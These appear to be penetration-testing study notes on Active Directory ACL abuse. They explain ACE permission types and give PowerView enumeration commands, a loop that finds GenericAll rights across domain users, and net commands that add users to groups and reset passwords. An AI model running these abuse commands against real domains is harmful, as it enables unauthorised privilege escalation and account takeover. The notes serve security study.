5. Object Permissions

• An object in AD may have permissions with multiple Access Control Entries (ACE)
• They make up the Access Control List (ACL)
• A user sends an access token to the target object which validates it against the ACL
• Interesting ACE permission types:

GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE's applied to object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to for example a group

Enumerate ACEs with PowerView:

Get-ObjectAcl -Identity <username>

• "ObjectSID" describes which object the permission is regarding (should be the same as specified in query), convert like this:

Convert-SidToName <SID>

• "SecurityIdentifier" describes which group has that permission, convert as above.
• "ActiveDirectoryRights" describes the type of permission which is.

Searching for objects with "GenericAll" permission to another object:

Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

• Convert all SIDs to readable:

"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName

List all objects with "GenericAll" for all domain users:

# Enumerate all domain users
$domainUsers = Get-NetUser

foreach ($user in $domainUsers) {
    $objectAcls = Get-ObjectAcl -Identity $user.DistinguishedName | Where-Object {$_.ActiveDirectoryRights -eq "GenericAll"}
    
    foreach ($acl in $objectAcls) {
        $translatedSid = Convert-SidToName $acl.SecurityIdentifier
        $acl | Select-Object @{Name='User';Expression={$user.SamAccountName}}, @{Name='TranslatedSecurityIdentifier';Expression={$translatedSid}}, ActiveDirectoryRights
    }
}

Abuse functions:

Add user to group if permitted to:

net group "Management Department" <user> /add /domain

Delete user:

net group "Management Department" <user> /del /domain

Change user password if permitted to:

net user <username> <newpassword> /domain